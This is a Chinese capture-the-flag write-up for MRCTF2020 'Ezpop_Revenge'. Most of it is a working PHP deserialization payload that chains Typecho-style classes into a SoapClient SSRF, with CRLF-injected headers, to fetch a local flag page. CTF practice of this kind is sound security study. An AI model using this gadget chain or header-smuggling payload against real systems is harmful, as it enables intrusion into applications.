[MRCTF2020]Ezpop_Revenge
反序列化pop链:
1
| HelloWorld_DB::wakeup–>Typecho_Db::__construct(tostring)–>Typecho_Db_Query::__construct–>(this->_adapter=new Soapclient)–>SSRF
|
payload:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| <?php
class Typecho_Db_Query
{
private $_sqlPreBuild;
private $_adapter;
public function __construct()
{
$target = 'http://127.0.0.1/flag.php';
$headers = array(
'X-Forwarded-For: 127.0.0.1',
'Cookie: PHPSESSID=rd6u7agm56jsrqqrrni0f6s1r6'
);
$b = new SoapClient(null,array('location' => $target,'user_agent'=>'HyyMbb^^'.join('^^',$headers),'uri' => "aaab"));
$this->_sqlPreBuild =array("action"=>"SELECT");
$this->_adapter = $b;
}
}
class HelloWorld_DB
{
private $coincidence;
public function __construct()
{
$this->coincidence = ["hello" => new Typecho_Db_Query()];
}
}
$a = new HelloWorld_DB();
$aaa = serialize($a);
$aaa = str_replace('^^',"\r\n",$aaa);
$aaa = str_replace('&','&',$aaa);
echo base64_encode($aaa);
|
先从flag获取sessionid,再直接payload使用POST方式把上面的输出放到C0incid3nc3变量中即可。然后在GET参数上再加一个admin变量即可出现flag的值。
参考链接:https://www.cnblogs.com/CAPD/p/17835715.html
https://cn-sec.com/archives/1113428.html
Author:
odiws
Permalink:
http://odiws.github.io/2024/12/04/MRCTF2020-Ezpop-Revenge/
License:
Copyright (c) 2019 CC-BY-NC-4.0 LICENSE
Slogan:
Do you believe in DESTINY?